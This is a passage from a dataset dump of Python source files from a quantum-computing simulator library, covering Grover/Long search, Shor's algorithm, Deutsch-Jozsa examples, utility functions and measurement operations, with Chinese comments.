states = qbsys.statesNd.swapaxes(0, qbsys.statesNdIndex(index))\n prob0 = sss(states[0, ...])\n if equal0(prob0):\n states[0, ...] = states[1, ...]\n states[1, ...] *= 0.\n qbsys.normalize()\n\n def __call__(self, qbs: Qubits) -> None:\n qbsys = qbs.system\n sysStopTrack = qbsys.stopTracking\n if qbsys.canTrack() and self.trackable:\n qbsys.addTrack(self.name, *qbs.indexes)\n qbsys.stopTracking = True\n self.call(qbs)\n if not sysStopTrack:\n qbsys.stopTracking = False\n\n\nR = _RESET()\nRA = _RESETALL()\n" }, { "alpha_fraction": 0.5319721698760986, "alphanum_fraction": 0.6048911809921265, "avg_line_length": 32.51128005981445, "blob_id": "0768763f2a5fa187541e6772597bd5c273f05d9c", "content_id": "e9f9a125c0ec78a6a68da72341c42d94edb945e2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5641, "license_type": "no_license", "max_line_length": 79, "num_lines": 133, "path": "/examples/5-LongAlgorithm.py", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nimport sys\nimport os\nsys.path.append(os.path.dirname(os.path.dirname(__file__)))\n\nfrom typing import Callable\n\nfrom numpy import pi, arcsin, sin, sqrt\n\nfrom nyasQuantumCalculate import *\nfrom nyasQuantumCalculate.Utils import Bools2Int\n\n\nOptions.autoNormalize = False\n\n\n########################## 改进 Grover 算法 ##################################\n\"\"\"\n值得注意的是, Grover搜索算法并不是迭代次数越多越精确的.\n记M为正确答案的数量, N为全部答案的数量, j = round(π / (4*arcsin(sqrt(M / N))) -.5),\n当迭代次数为j时, 测量出正确答案的机率比较大.\n当迭代次数为2*j时, 测量出错误答案机率比较大.\n3*j时为正确答案的机率大, 4*j时为错误答案, 以此类推\n\n记|Good❭为所有正确答案的叠加态, |Bad❭为所有错误状态的叠加态.\n则叠加态|ψ❭在相空间{O;|Bad❭,|Good❭}里是一个长度为1的矢态. 记均匀叠加态(H|0❭)^(⊗n)与\n|Bad❭之间的夹角为θ, 则每次运算Grover过程都会使|ψ❭在相空间里旋转2θ. 当|ψ❭与|Bad❭夹角\n为π/2时, 则|ψ❭与|Good❭夹角为0, 此时以概率1测出正确答案.\n但每次迭代一定会旋转2θ, 当迭代次数过多时会使|ψ❭向-|Bad❭转动, 以此类推.\n\n实际上θ = arcsin(sqrt(M / N))), 则迭代次数j = round(π / 4θ - .5)\n\"\"\"\n\"\"\"\nGrover算法一个致命缺点是旋转角度θ与迭代次数j无关, θ只与数据相关.\n龙桂鲁团队提出了一个改进版Grover算法, 被称作Long算法.\n这个算法从迭代次数j中得出旋转角度θ\n\"\"\"\n\"\"\"\nGrover过程, 也就是单次迭代记作G,\nG = -W(I-(exp(iφ)+1)|0❭❬0|)W(I-(exp(iφ)+1)|Good❭❬Good|).\n在Grover算法里, φ = π, 并且 -W(I-(exp(iφ)+1)|0❭❬0|)W 即为Grover扩散算子,\nI-(exp(iφ)+1)|Good❭❬Good|为需要搜索的黑盒.\n\n在Long算法里, φ = 2*arcsin(sin(π / (4*J+6)) / sinθ),\n其中J >= j_op = floor(π / 4θ - .5). 则迭代次数j为J+1\n当J<j_op时, φ为复数, 这时Grover过程失去定义(非酉).\n也就是说Long算法并不会比Grover算法快.\n\"\"\"\n\n\n############################# 图形着色问题 ###################################\n\"\"\"此处的例子与4-GroverAlgorithm.py相同, 就不过多叙述了\n需要注意的是, 旋转门的角度需要在一开始就确定, 所以这里的计算顺序有所调整\"\"\"\n\n\nedges = [(0, 1), (0, 2), (0, 3), (1, 2), (1, 3), (2, 3), (3, 4)]\nnColorBits = 2\nnVertex = max(max(edge) for edge in edges) + 1\n\n\n# 计算迭代Grover过程的数量\nm = 72 # 正确答案的数量\nn = 2 ** (nColorBits * nVertex) # 所有答案的数量\ntheta = arcsin(sqrt(m / n)) # 均匀叠加态在相空间里的辐角\nj_op = int(pi / (4 * theta) - .5) # Grover算法最少迭代次数\nJ = j_op # Long算法里的可调参数, 这里选择运行最快的\nj = J + 1 # Long算法迭代的次数\n# Long算法里对相位旋转的角度\nphi = 2 * arcsin(sin(pi / (4 * J + 6)) / sin(theta))\nRO = R1(phi) # 相位旋转矩阵\n\n\ndef ColorEquality(c0: Qubits, c1: Qubits, target: Qubit):\n for q0, q1 in zip(c0, c1):\n Builtin.CNOT(q0, q1)\n ApplyToEach(Builtin.X, c1)\n Controlled(Builtin.X, c1, target)\n ApplyToEach(Builtin.X, c1)\n for q0, q1 in zip(c0, c1):\n Builtin.CNOT(q0, q1)\n\n\ndef ValidVertexColoring(register: Qubits, target: Qubit):\n assert len(register) == nColorBits * nVertex\n colors = [register[nColorBits*v: nColorBits*(v+1)] for v in range(nVertex)]\n with TemporaryQubits(register.system, len(edges)) as edgesResult:\n for (idx0, idx1), edgeResult in zip(edges, edgesResult):\n ColorEquality(colors[idx0], colors[idx1], edgeResult)\n ApplyToEach(Builtin.X, edgesResult)\n # target输入不再是|0❭-|1❭的相位反冲, 而是输入|1❭\"相位偏移\"(乱起的名字)\n Controlled(RO, edgesResult, target)\n ApplyToEach(Builtin.X, edgesResult)\n for (idx0, idx1), edgeResult in zip(edges, edgesResult):\n ColorEquality(colors[idx0], colors[idx1], edgeResult)\n\n\ndef LongSearch(f: Callable[[Qubits, Qubit], None],\n register: Qubits, nIter: int):\n ApplyToEach(Builtin.H, register)\n with TemporaryQubit(register.system) as target:\n # \"相位偏移\"使用|1❭, 而不是|0❭-|1❭\n Builtin.X(target)\n for _ in range(nIter):\n f(register, target)\n ApplyToEach(Builtin.H, register)\n ApplyToEach(Builtin.X, register)\n # 偏移均值相位, 而不是翻转\n Controlled(RO, register[0:-1], register[-1])\n ApplyToEach(Builtin.X, register)\n ApplyToEach(Builtin.H, register)\n Builtin.X(target)\n\n\nqbsys = QubitsSystem(nColorBits * nVertex)\nregister = qbsys.getQubits()\n\nLongSearch(ValidVertexColoring, register, j)\nresult = Builtin.MA(register)\nBuiltin.RA(register)\n\nfor v in range(nVertex):\n print(f\"Vertex {v} has color \"\n f\"{Bools2Int(result[nColorBits*v : nColorBits*(v+1)])}\")\n\n\n# edges=[(0,1),(0,2),(0,3),(1,2),(1,3),(2,3),(3,4)] 的解\nanswer = [108, 109, 110, 120, 121, 123, 156, 157, 158, 180, 182, 183, 216, 217,\n 219, 228, 230, 231, 300, 301, 302, 312, 313, 315, 396, 397, 398, 433,\n 434, 435, 456, 457, 459, 481, 482, 483, 540, 541, 542, 564, 566, 567,\n 588, 589, 590, 625, 626, 627, 708, 710, 711, 721, 722, 723, 792, 793,\n 795, 804, 806, 807, 840, 841, 843, 865, 866, 867, 900, 902, 903, 913,\n 914, 915]\nprint(f\"Is result correct: {Bools2Int(result) in answer}\")\n" }, { "alpha_fraction": 0.5165289044380188, "alphanum_fraction": 0.5296769142150879, "avg_line_length": 26.585493087768555, "blob_id": "852a2bbd29f9d57936385ff46883abb1cd4f7c89", "content_id": "67f48f987ec2d7ee7ee5422cb1a334971c782ed0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5948, "license_type": "no_license", "max_line_length": 79, "num_lines": 193, "path": "/examples/8-ShorAlgorithm.py", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nimport sys\nimport os\nsys.path.append(os.path.dirname(os.path.dirname(__file__)))\n\nfrom typing import Union, List\n\nfrom nyasQuantumCalculate import *\nfrom nyasQuantumCalculate.Builtin import *\n\n\nOptions.autoNormalize = False\nOptions.QFTswap = False\n\n\n###############################################################################\n\"\"\"下面的方法可以参考 https://www.bilibili.com/read/cv11142193\"\"\"\n\ndef PhaseModularAddInt(a: int, N: int, register: Qubits) -> None:\n sign = register[0]\n PhaseAddInt(a, register)\n IPhaseAddInt(N, register)\n IQFT(register)\n with TemporaryQubit(register.system) as tmp:\n CNOT(sign, tmp)\n QFT(register)\n Controlled(PhaseAddInt, tmp.asQubits(), N, register)\n IPhaseAddInt(a, register)\n IQFT(register)\n X(sign)\n CNOT(sign, tmp)\n X(sign)\n QFT(register)\n PhaseAddInt(a, register)\n\ndef IPhaseModularAddInt(a: int, N: int, register: Qubits) -> None:\n sign = register[0]\n IPhaseAddInt(a, register)\n IQFT(register)\n X(sign)\n with TemporaryQubit(register.system) as tmp:\n CNOT(sign, tmp)\n X(sign)\n QFT(register)\n PhaseAddInt(a, register)\n Controlled(IPhaseAddInt, tmp.asQubits(), N, register)\n IQFT(register)\n CNOT(sign, tmp)\n QFT(register)\n PhaseAddInt(N, register)\n IPhaseAddInt(a, register)\n\ndef ModularMultiplyIntAdd(a: int, N: int, x: Qubits, b: Qubits) -> None:\n QFT(b)\n for x_ele in x[::-1]:\n Controlled(PhaseModularAddInt, x_ele.asQubits(), a % N, N, b)\n a <<= 1\n IQFT(b)\n\ndef IModularMultiplyIntAdd(a: int, N: int, x: Qubits, b: Qubits) -> None:\n QFT(b)\n for x_ele in x[::-1]:\n Controlled(IPhaseModularAddInt, x_ele.asQubits(), a % N, N, b)\n a <<= 1\n IQFT(b)\n\ndef ModularInverse(a: int, N: int) -> int:\n old_r, r = a, N\n old_s, s = 1, 0\n while r > 1:\n quotient = old_r // r\n old_r, r = r, old_r - quotient * r\n old_s, s = s, old_s - quotient * s\n return s\n\ndef U_aN(a: int, N: int, register: Qubits) -> None:\n if a == 1:\n return\n with TemporaryQubit(register.system) as sign:\n x = sign + register\n with TemporaryQubits(x.system, len(x)) as tmp:\n ModularMultiplyIntAdd(a, N, x, tmp)\n for _x, _tmp in zip(x, tmp):\n SWAP(_x, _tmp)\n ia = ModularInverse(a, N)\n IModularMultiplyIntAdd(ia, N, x, tmp)\n\ndef GuessingPeriodR(j: int, n: int, N: int) -> List[int]:\n if j < 2 ** n / N:\n return list()\n cFrac = Utils.Frac2ContinuedFrac(j, 2 ** n)\n result: set[int] = set()\n for i in range(1, len(cFrac)):\n _, k = Utils.ContinuedFrac2Frac(cFrac[:i])\n if k >= N:\n break\n result.add(k)\n return list(result)\n\n\n###############################################################################\n\n\ndef RunQuantumPart(a: int, N: int, n: int,\n PhaseQubit: Qubit, register: Qubits) -> int:\n # 输入的是随机选择的整数a, 被分解的整数N, 求解精度n,\n # 和相位估计的量子位, 储存叠加态的寄存器\n\n # 因为化简版的相位估计是从U^(2^(n-1))开始计算,\n # 并且 (a^2)%N = ((a%N)^2)%N, 所以可以使用迭代计算所有(a^(2^l))%N\n a_s = [a]\n for _ in range(n - 1):\n a_s.append((a_s[-1] ** 2) % N)\n\n # 制备叠加特征态\n ApplyFromInt(X, 1, register)\n # 相位估计算法, 把测量结果放在一个列表里\n result = [False] * n\n phi = 0.\n for i in range(n):\n H(PhaseQubit)\n Controlled(U_aN, PhaseQubit.asQubits(), a_s[n - i - 1], N, register)\n R1(-2 * Utils.pi * phi)(PhaseQubit)\n H(PhaseQubit)\n res = M(PhaseQubit)\n if res: X(PhaseQubit)\n phi = phi / 2 + int(res) / 4\n result[n - i - 1] = res\n # 把测量结果转为整数然后输出\n R(PhaseQubit)\n RA(register)\n return Utils.Bools2Int(result)\n\ndef FromPeriodRGetFactor(a: int, N: int, r: int) -> Union[int, None]:\n # 从r中得到N的因数\n if r % 2 == 1:\n return\n b = a ** (r // 2)\n if b % N == N - 1:\n return\n # 因为这里的r很有可能不是真正的阶\n # 所以 gcd(b-1,N)!=1 也可能不符合\n c = Utils.gcd(b - 1, N)\n if c == 1:\n return\n return c\n\n\n###############################################################################\n\n\ndef RunShorAlgorithm(N: int) -> int:\n # 过滤N\n if N % 2 == 0:\n return 2\n # TODO: 这里应该加一步筛选 N=p^q 的传统算法\n # 但是实在找不到如何实现\n\n m = Utils.nBits(N) # 表示N的最少比特数\n n = 2 * m + 1 # 相位估计的求解精度\n # 初始化量子系统\n qbsys = QubitsSystem(1 + m)\n PhaseQubit = qbsys[0] # 用于相位估计的量子位\n register = qbsys[1:] # 用于储存特征态的量子位\n randomQubits = QubitsSystem(m)[:] # 使用量子计算机计算随机数\n\n # 开始算法\n factor = None # 已求得的因数\n while factor is None:\n # 得到随机整数a, 量子随机数输出范围为[0,2^m)\n # 这将以最低0.5的概率得到a [2,N-1)\n ApplyToEach(H, randomQubits)\n a = Utils.Bools2Int(MA(randomQubits))\n if a < 2 or a > N - 2:\n continue\n # 计算gcd(a,N), 如果不为1则得到N的因数\n b = Utils.gcd(a, N)\n if b != 1:\n factor = b\n continue\n # 使用量子计算器求得r的候选集\n j = RunQuantumPart(a, N, n, PhaseQubit, register)\n r_s = GuessingPeriodR(j, n, N)\n # 对候选集里的数字计算是否可以得到N的因数\n for r in r_s:\n factor = FromPeriodRGetFactor(a, N, r)\n if factor is not None:\n break\n # 输出\n RA(randomQubits)\n return factor\n\nprint(\"Find factor:\", RunShorAlgorithm(21))\n" }, { "alpha_fraction": 0.5797258019447327, "alphanum_fraction": 0.5928932428359985, "avg_line_length": 26.719999313354492, "blob_id": "5c0f292721e302f612ace4069eada07d16de4127", "content_id": "3422f0bf5b0002be9a7cf188b02dc250e09fc0f4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6932, "license_type": "no_license", "max_line_length": 77, "num_lines": 200, "path": "/examples/2-DeutschJozsaAlgorithm.py", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nimport sys\nimport os\nsys.path.append(os.path.dirname(os.path.dirname(__file__)))\n\nimport numpy as np\n\nfrom nyasQuantumCalculate import *\n\n\n\n# Deutsche Jozsa 算法 是一个很好的展示量子计算的简单算法\n# 它足够简单, 只需要几个位门即可完成, 并且相比传统算法运算快很多*\n# *当然对于模拟量子计算来说是不会有速度提升的, 但是也不妨碍在这里用作例子\n\n\n################### 什么是 Deutsche Jozsa 算法 ################################\n\"\"\" Deutsche Jozsa 算法:\n\n有一个未知函数 f: {0,1}^n -> {0,1}*, 并且已知f要么是常数函数, 要么是均衡函数**, 判断f\n是常数函数还是均衡函数***\n\n* 按人话说就是f输入n个0或1, 然后输出一个0或1\n** 均衡的意思是, 在对于所有可能的输入来说, 有一半结果是0, 另外一半是1\n*** 只需要判断f是哪种类型的函数, 而不在意f的输出结果\n\"\"\"\n\n\n############################## 传统算法 #######################################\n\"\"\"\n把 f 的输入\"{0,1}^n\"可以看作\"[0,2^n)&Z\" (按人话来说就是从0到2^n但不包含2^n的整数)\n\n在传统算法里, 只能从0开始历遍, 当历遍到有值与之前的值不一致时, 说明f不是常数函数, 那必\n然是均衡函数. 并且历遍超过可能输入的一半时, 说明f不是均衡函数, 是常数函数.\n\n按照上述思路, 实现算法至少需要2步, 至多需要2^(n-1)+1步\n\"\"\"\n\n# 这里提供几种常见的函数 (为了节省篇幅就省略一点空行了)\nclass UnknownFunctionClassical:\n def __init__(self, n: int = 0) -> None:\n raise NotImplementedError\n def __call__(self, x: int) -> bool:\n raise NotImplementedError\n\nclass Constant0C(UnknownFunctionClassical):\n def __init__(self, n: int) -> None:\n pass\n def __call__(self, x: int) -> bool:\n return False\n\nclass Constant1C(UnknownFunctionClassical):\n def __init__(self, n: int) -> None:\n pass\n def __call__(self, x: int) -> bool:\n return True\n\nclass IfNthBitC(UnknownFunctionClassical):\n # 如果第n个bit为1, 则返回1, 否则为0\n def __init__(self, n: int) -> None:\n self.tag = 1 << n\n def __call__(self, x: int) -> bool:\n return x & self.tag != 0\n\nclass Even1BitsC(UnknownFunctionClassical):\n # 如果有偶数个1, 则返回0, 否则为1\n def __init__(self, n: int) -> None:\n pass\n def __call__(self, x: int) -> bool:\n count = 0\n while x >= 1:\n if x & 1:\n count += 1\n x >>= 1\n return count & 1 == 0\n\nclass RandomFunC(UnknownFunctionClassical):\n def __init__(self, n: int) -> None:\n self.choice = np.array(())\n def setTotalBits(self, n: int) -> None:\n self.choice = np.random.choice(1 << n, 1 << (n - 1), False)\n def __call__(self, x: int) -> bool:\n return x in self.choice\n\n\n################# 算法本体\n\ndef DeutscheJozsaClassical(totalBits: int,\n func: UnknownFunctionClassical) -> bool:\n if isinstance(func, RandomFunC):\n func.setTotalBits(totalBits)\n # 如果func为常数函数则返回True, 否则为False\n f0 = func(0)\n steps = 1\n isConstant = True\n # python 的 range 并不包含最后一个数字a\n for x in range(1, (1 << (totalBits - 1)) + 1):\n steps += 1\n if func(x) != f0:\n isConstant = False\n break\n print(f\"Total Steps: {steps} (Classical)\")\n return isConstant\n\nprint(f\"Is constant function?(C): {DeutscheJozsaClassical(5, IfNthBitC(3))}\")\n# 可以自己尝试调一下数据试着运行\n\n\n\n############################### 量子算法 ######################################\n\"\"\"\n量子计算的一个巨大的优点就是并行运算. 这给了一点启示: 可以把f全部可能的输入都计算一遍,\n然后再统计结果.\n\n对于函数 f, 需要把它变为应该可以作用在量子位上的位门 U, 可以设计为如果f输出1, 则位门U\n把系统状态反转 (乘上-1).\n\n如果f是均衡函数, 那么量子系统里有一半的状态都被反转, 这时候把状态全部互相干涉的话, 结果\n不会在∣0❭聚集. 反之, 如果全部状态的相位抑制, 那么互相干涉后状态会在∣0❭聚集\n\"\"\"\n\n# 这里提供几种常见的函数 (为了节省篇幅就省略一点空行了)\nclass UnknownFunctionQuantum:\n def __init__(self, n: int = 0) -> None:\n raise NotImplementedError\n def __call__(self, qbs: Qubits) -> None:\n raise NotImplementedError\n\nclass Constant0Q(UnknownFunctionQuantum):\n def __init__(self, n: int) -> None:\n pass\n def __call__(self, qbs: Qubits) -> None:\n pass\n\nclass Constant1Q(UnknownFunctionQuantum):\n def __init__(self, n: int) -> None:\n self.reversStateGate = -1. * Builtin.I\n def __call__(self, qbs: Qubits) -> None:\n self.reversStateGate(qbs[0])\n\nclass IfNthBitQ(UnknownFunctionQuantum):\n def __init__(self, n: int) -> None:\n self.n = n\n\n def __call__(self, qbs: Qubits) -> None:\n if self.n >= len(qbs):\n return\n Builtin.Z(qbs[self.n])\n\nclass Even1BitsQ(UnknownFunctionQuantum):\n def __init__(self, n: int) -> None:\n pass\n def __call__(self, qbs: Qubits) -> None:\n ApplyToEach(Builtin.Z, qbs)\n\nclass RandomFunQ(UnknownFunctionQuantum):\n def __init__(self, n: int) -> None:\n pass\n def __call__(self, qbs: Qubits) -> None:\n n = len(qbs)\n choice = np.random.choice(1 << n, 1 << (n - 1), False)\n with TemporaryQubit(qbs.system) as tmQ:\n # 使用了所谓的\"相位反冲技巧\"\n Builtin.X(tmQ)\n Builtin.H(tmQ)\n for integer in choice:\n ControlledOnInt(Builtin.X, integer, qbs, tmQ)\n Builtin.H(tmQ)\n Builtin.X(tmQ)\n\n\n################# 算法本体\n\ndef DeutscheJozsaQuantum(totalBits: int,\n func: UnknownFunctionQuantum) -> bool:\n # 如果func为常数函数则返回True, 否则为False\n sytm = QubitsSystem(totalBits)\n qubits: Qubits = sytm[:]\n #DumpSystemFig(sytm) if have_matplotlib else DumpSystemText(sytm)\n\n ApplyToEach(Builtin.H, qubits)\n #DumpSystemFig(sytm) if have_matplotlib else DumpSystemText(sytm)\n\n func(qubits)\n #DumpSystemFig(sytm) if have_matplotlib else DumpSystemText(sytm)\n\n ApplyToEach(Builtin.H, qubits)\n #DumpSystemFig(sytm) if have_matplotlib else DumpSystemText(sytm)\n\n result = Builtin.MA(qubits)\n Builtin.RA(qubits)\n return not any(result)\n\nprint(f\"Is constant function?(Q): {DeutscheJozsaQuantum(5, Constant1Q(3))}\")\n# 可以自己尝试调一下数据试着运行\n\n\n####################### 强烈注意\n# 大多数情况下, DeutscheJozsa算法的示例是使用标记黑盒, 需要totalBits+1个量子位\n# 但这里是使用的是相位黑盒, 所以只需要totalBits个量子位\n" }, { "alpha_fraction": 0.6285714507102966, "alphanum_fraction": 0.6373626589775085, "avg_line_length": 22.947368621826172, "blob_id": "5fade20851e8a383e7b919d8bc18d2996ef67d43", "content_id": "df4a5aab97c6cb6ad343fc8fde6671265ba039ad", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 455, "license_type": "no_license", "max_line_length": 74, "num_lines": 19, "path": "/examples/others/AdderWithQFT.py", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "from nyasQuantumCalculate import *\nfrom nyasQuantumCalculate.Utils import *\n\nn = 3\n\nqbsys = QubitsSystem(2 * n)\nregisterA = qbsys[:n]\nregisterB = qbsys[n:]\n\nN = 1 << n\nfor a in range(N):\n for b in range(N):\n ApplyFromInt(Builtin.X, a, registerA)\n ApplyFromInt(Builtin.X, b, registerB)\n\n Add(registerA, registerB)\n\n print(f\"mod({a} + {b}, {N}) = {Bools2Int(Builtin.MA(registerB))}\")\n Builtin.RA(registerA + registerB)\n" }, { "alpha_fraction": 0.5011417865753174, "alphanum_fraction": 0.5304130911827087, "avg_line_length": 20.698198318481445, "blob_id": "9717c73dedac664b5fa49f39a3de2ffa1d7481aa", "content_id": "7bd3eef77c15ebf1317c0a91a825adcb5b311978", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5493, "license_type": "no_license", "max_line_length": 87, "num_lines": 222, "path": "/nyasQuantumCalculate/Utils.py", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\n\"\"\"一些库内大量使用的方法和小工具\n\ndelta: 控制浮点数比较精度 [default: 1e-8]\nColorWeel2RGB()\nTimeChunck\n\"\"\"\n\nfrom typing import Any, Callable, Dict, Iterable, List, Literal, Optional, Tuple, Union\nfrom time import time\n\nimport numpy as np\n\nfrom .Options import *\n\n\n__all__ = [\"equal0\", \"sss\", \"delta\", \"ColorWheel2RGB\", \"TimeChunck\",\n \"Bools2Int\", \"Int2Bools\", \"pi\", \"nBits\", \"Bools2str01\",\n \"gcd\", \"extended_gcd\", \"Frac2ContinuedFrac\", \"ContinuedFrac2Frac\"]\n\n\npi = np.pi\n\ndelta = 1e-8\n\n\ndef equal0(x: float) -> bool:\n return abs(x) <= delta\n\n\ndef sss(arr: np.ndarray) -> Any:\n return np.sum(np.square(np.abs(arr)))\n\n\ndef colorF(n: int, h: float) -> float:\n k = np.mod(n + h, 6.)\n if k <= 2:\n return np.clip(k, 0., 1.)\n return np.clip(4. - k, 0., 1.)\n\n\ndef ColorWheel2RGB(theta: float, get01: bool = False) -> \\\n Union[Tuple[int, int, int], Tuple[float, float, float]]:\n \"\"\"从色环上获取颜色\n\n 输入色环角度可以获取RGB颜色, 0为红色, 2*pi/3为绿色, 4*pi/3为蓝色\n\n Args:\n theta: 色环角度\n get01: 如果为真, 返回[0.~1.]的浮点数, 否则为[0~255]的整数\n\n Return:\n 返回包含RGB颜色的元组\"\"\"\n h_pi_3 = 3. * theta / pi\n red = colorF(2, h_pi_3)\n green = colorF(0, h_pi_3)\n blue = colorF(4, h_pi_3)\n if get01:\n return red, green, blue\n return int(red * 255.), int(green * 255.), int(blue * 255.)\n\n\ntotaltimer: Dict[str, List[Union[int, float]]] = dict()\n\nclass TimeChunck:\n \"\"\"TimeChunk(str)\n\n 配合with语句计算特定代码块调用的次数和总共运行时间\n\n To use:\n >>> for _ in range(15):\n ... with TimeChunck(\"test\"):\n ... time.sleep(0.03)\n ...\n >>> TimeChunck.getAll()\n {'test': [15, 0.47789764404296875]}\n \"\"\"\n def __init__(self, name: str):\n self.name = name\n self.start = 0.\n\n @staticmethod\n def getAll() -> Dict[str, List[Union[int, float]]]:\n \"\"\"得到全部计时条目\n\n Returns:\n 一个字典包含计时名词, 和调用次数与总共运行时间的列表\"\"\"\n return totaltimer\n\n def __enter__(self):\n if self.name not in totaltimer:\n totaltimer[self.name] = [0, 0.]\n self.start = time()\n\n def __exit__(self, _:Any, __: Any, ___: Any) -> None:\n totaltimer[self.name][0] += 1\n totaltimer[self.name][1] += time() - self.start\n\n\ndef Bools2Int(bools: Iterable[Union[Literal[0, 1], bool]]) -> int:\n \"\"\"把bit列表转为int\n\n Args:\n l: 可迭代的对象, 内部元素为bool或0,1\n\n Returns:\n 逐位排列组成的整数\"\"\"\n res = 0\n for ele in (list(bools)[::-1] if Options.littleEndian else bools):\n res <<= 1\n res |= int(ele)\n return res\n\n\ndef Int2Bools(x: int, n: Optional[int] = None) -> List[bool]:\n \"\"\"把int转为bit列表\n\n Args:\n x: 需要转化的整数, 必须大于等于0\n n: 输出列表的长度, 默认为可以表示x的最短长度\n\n Returns:\n bool列表, 第1个为x的高位\"\"\"\n if x < 0:\n raise ValueError(\"Negative numbers cannot be converted to 'bools'\")\n if n is None:\n res: List[bool] = list()\n while x > 0:\n res.append(x & 1 == 1)\n x >>= 1\n else:\n res: List[bool] = [False] * n\n for i in range(n):\n if x <= 0:\n break\n res[i] = x & 1 == 1\n x >>= 1\n return res if Options.littleEndian else res[::-1]\n\n\ndef FlipBools(bools: Iterable[Union[Literal[0, 1], bool]]) -> List[bool]:\n \"\"\"翻转列表里的所有布尔值\n\n Args:\n l: 可迭代对象, 内部元素为bool或0,1\n\n Returns:\n 翻转布尔值后的数组\"\"\"\n return [not bool(ele) for ele in bools]\n\n\ndef nBits(x: int) -> int:\n \"\"\"检查x至少需要多少bits表示\n\n Args:\n x: 需要检查的数字, 应该大于等于0\n\n Returns:\n 至少可以表示x的bit长度\"\"\"\n if x < 0:\n raise ValueError(\"x should be greater than 0\")\n n = 0\n while x > 0:\n x >>= 1\n n += 1\n return max(n, 1)\n\n\ndef Bools2str01(bools: Iterable[Union[Literal[0, 1], bool]]) -> str:\n \"\"\"把bit列表表示为更好的二进制字符串\n\n Args:\n bools: bit列表\n\n Returns:\n 0和1组成的字符串\"\"\"\n return \"\".join(map(lambda x: '1' if x else '0', bools))\n\n\ngcd: Callable[[int, int], int] = lambda a, b: np.gcd(a, b)\n\n\ndef extended_gcd(a: int, b: int) -> Tuple[int, int, int]:\n \"\"\"扩展欧几里得算法\n\n 求得满足 a*x + b*y = gcd(a,b) 的数字\n\n Args:\n a: 整数\n b: 整数\n\n Returns:\n x, y, gcd(a,b) 组成的元组\"\"\"\n old_r, r = a, b\n old_s, s = 1, 0\n old_t, t = 0, 1\n while r != 0:\n quotient = old_r // r\n old_r, r = r, old_r - quotient * r\n old_s, s = s, old_s - quotient * s\n old_t, t = t, old_t - quotient * t\n return old_s, old_t, old_r\n\n\ndef Frac2ContinuedFrac(a: int, b: int) -> List[int]:\n \"\"\"普通分式化为连分式\"\"\"\n result: List[int] = list()\n while b >= 1:\n c, t = divmod(a, b)\n result.append(c)\n a, b = b, t\n return result\n\n\ndef ContinuedFrac2Frac(fracs: List[int]) -> Tuple[int, int]:\n \"\"\"连分式化为普通分式\"\"\"\n f = fracs.copy()\n a, b = f.pop(), 1\n while len(f) > 0:\n a, b = a * f.pop() + b, a\n return a, b\n" }, { "alpha_fraction": 0.544562578201294, "alphanum_fraction": 0.5564186573028564, "avg_line_length": 25.301074981689453, "blob_id": "14c7ffeead94ec7ef54fd08e8e51943ad4b30543", "content_id": "dd252559453d5a4ae620df1a2009018160d33db1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2554, "license_type": "no_license", "max_line_length": 78, "num_lines": 93, "path": "/nyasQuantumCalculate/Operate/Measure.py", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nfrom typing import List\n\nimport numpy as np\n\nfrom .QubitsOperation import *\nfrom nyasQuantumCalculate.Utils import *\nfrom nyasQuantumCalculate.System import *\n\n\n__all__ = [\"M\", \"MA\"]\n\n\nclass _MEASURE(QubitsOperation):\n \"\"\"测量一个量子位\n\n Args:\n qb: 需要重置的量子位\n\n Returns:\n 如果测量为0返回False, 否则返回True\n \"\"\"\n\n def __init__(self) -> None:\n super().__init__()\n self.name = \"MEASURE\"\n self.trackable = True\n\n def call(self, qb: Qubit) -> bool:\n qbsys = qb.system\n states = qbsys.statesNd.swapaxes(0, qbsys.statesNdIndex(qb.index))\n prob0 = sss(states[0, ...])\n prob1 = sss(states[1, ...])\n choice = 0 if np.random.random() * (prob0 + prob1) <= prob0 else 1\n states[choice, ...] /= np.sqrt(sss(states[choice, ...]))\n states[1 - choice, ...] *= 0.\n return choice == 1\n\n def __call__(self, qb: Qubit) -> bool:\n qbsys = qb.system\n sysStopTrack = qbsys.stopTracking\n if qbsys.canTrack() and self.trackable:\n qbsys.addTrack(self.name, qb.index)\n qbsys.stopTracking = True\n result = self.call(qb)\n if not sysStopTrack:\n qbsys.stopTracking = False\n return result\n\n\nclass _MEASUREALL(QubitsOperation):\n \"\"\"测量多个量子位\n\n Args:\n qbs: 需要重置的量子位\n\n Returns:\n bool列表, 如果测量为0返回False, 否则返回True\n \"\"\"\n\n def __init__(self) -> None:\n super().__init__()\n self.name = \"MEASUREALL\"\n self.trackable = True\n\n def call(self, qbs: Qubits) -> List[bool]:\n qbsys = qbs.system\n result: List[bool] = list()\n for index in qbs.indexes:\n states = qbsys.statesNd.swapaxes(0, qbsys.statesNdIndex(index))\n prob0 = sss(states[0, ...])\n prob1 = sss(states[1, ...])\n choice = 0 if np.random.random() * (prob0 + prob1) <= prob0 else 1\n states[1 - choice, ...] *= 0.\n result.append(choice == 1)\n qbsys.normalize()\n return result\n\n def __call__(self, qbs: Qubits) -> List[bool]:\n qbsys = qbs.system\n sysStopTrack = qbsys.stopTracking\n if qbsys.canTrack() and self.trackable:\n qbsys.addTrack(self.name, *qbs.indexes)\n qbsys.stopTracking = True\n result = self.call(qbs)\n if not sysStopTrack:\n qbsys.stopTracking = False\n return result\n\n\nM = _MEASURE()\nMA = _MEASUREALL()\n" }, { "alpha_fraction": 0.4237288236618042, "alphanum_fraction": 0.43220338225364685, "avg_line_length": 